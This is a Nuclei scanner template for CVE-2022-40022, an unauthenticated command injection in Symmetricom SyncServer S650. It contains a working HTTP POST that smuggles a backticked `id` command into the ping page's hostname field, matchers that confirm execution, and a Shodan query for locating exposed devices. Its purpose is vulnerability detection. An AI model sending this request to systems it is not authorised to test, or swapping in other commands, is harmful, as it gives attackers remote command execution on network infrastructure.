nuclei-templates/http/cves/2022/CVE-2022-40022.yaml

56 lines
1.9 KiB
YAML
Raw Normal View History

2023-06-22 05:46:36 +00:00
id: CVE-2022-40022
info:
name: Symmetricom SyncServer Unauthenticated - Remote Command Execution
author: DhiyaneshDK
severity: critical
description: |
Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.
reference:
- http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-40022
2023-07-11 19:49:27 +00:00
- https://www.microsemi.com/campaigns/network-time-servers/S650p/%3Fgd%3D1&id=5&gclid=Cj0KCQjwjbyYBhCdARIsAArC6LL-202ej5YfDB5lMIMSZ2735qjo5yaj2i-PrvLv2Cnh_kIJtFJ0oF8aAlMpEALw_wcB
- https://www.microsemi.com/campaigns/network-time-servers/syncserver-s600/?url=
- https://www.microsemi.com/document-portal/doc_download/135737-datasheet-syncserver-s650
2023-06-22 05:46:36 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40022
2023-07-11 19:49:27 +00:00
cwe-id: CWE-77
epss-score: 0.75757
cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:*
2023-06-22 05:46:36 +00:00
metadata:
max-request: 1
shodan-query: html:"Symmetricom SyncServer"
verified: "true"
2023-07-11 19:49:27 +00:00
vendor: microchip
product: syncserver_s650_firmware
tags: packetstorm,cve,cve2022,syncserver,rce,unauth
2023-06-22 05:46:36 +00:00
http:
- raw:
- |
POST /controller/ping.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/controller/ping.php
currentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
2023-07-11 19:49:27 +00:00
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+)"
2023-06-22 05:46:36 +00:00
- type: status
status:
- 302